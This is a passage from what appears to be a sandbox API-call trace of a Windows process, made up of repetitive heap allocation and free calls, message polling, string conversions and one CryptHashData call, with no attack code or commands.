hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0265.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0265.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0265.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55008 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0265.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0265.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0265.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.084] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0265.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0265.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0265.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fa8 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0265.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0265.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0265.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d18 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0265.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0265.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0265.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.087] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.087] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0265.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51e38 [0265.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51e38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0265.088] CryptHashData (hHash=0xa87290, pbData=0x2e54fa8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0265.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 